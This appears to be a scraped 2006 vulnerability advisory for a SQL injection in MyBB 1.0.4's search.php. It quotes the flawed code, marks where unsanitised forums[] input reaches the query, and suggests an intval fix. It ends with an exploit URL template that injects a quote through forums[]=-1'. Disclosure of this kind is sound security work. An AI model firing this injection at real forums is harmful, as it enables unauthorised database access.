MyBB 1.0.4 New SQL Injection

2006-03-0300:00:00

vulners.com

JSON

            D3vil-0x1
            
            File :- search.php

580 to 592

/* START */

if($mybb->input['forums'] != "all")

    {

            if&#40;!is_array&#40;$mybb-&gt;input[&#39;forums&#39;]&#41;&#41; &lt;&lt;-- We Break It By forums[]=-1

            {

                    $mybb-&gt;input[&#39;forums&#39;] = array&#40;intval&#40;$mybb-&gt;input[&#39;forums&#39;]&#41;&#41;;

            }

            foreach&#40;$mybb-&gt;input[&#39;forums&#39;] as $forum&#41;

            {

                    if&#40;!$searchin[$forum]&#41;

                    {

                            $query = $db-&gt;query&#40;&quot;SELECT f.fid FROM &quot;.TABLE_PREFIX.&quot;forums f LEFT JOIN

".TABLE_PREFIX."forumpermissions p ON (f.fid=p.fid AND p.gid='".$mybb->user[usergroup]."') WHERE
INSTR(CONCAT(',',parentlist,','),',$forum,') > 0 AND active!='no' AND (ISNULL(p.fid) OR p.cansearch='yes')");

                            if&#40;$db-&gt;num_rows&#40;$query&#41; == 1&#41;

                            {

                                    $wheresql .= &quot; AND t.fid=&#39;$forum&#39; &quot;; &lt;&lt;-- First SQL Injection

                                    $searchin[$fid] = 1;

}

Fix it :-

Add :-

$forum = intval($forum); To Line 568

/* END*/

/* Exploit */

[username] = any username in victem forum

[HOST]/[PATH]/search.php?action=do_search&postthread=1&author=[username]&matchusername=1&forums[]=-1'

JSON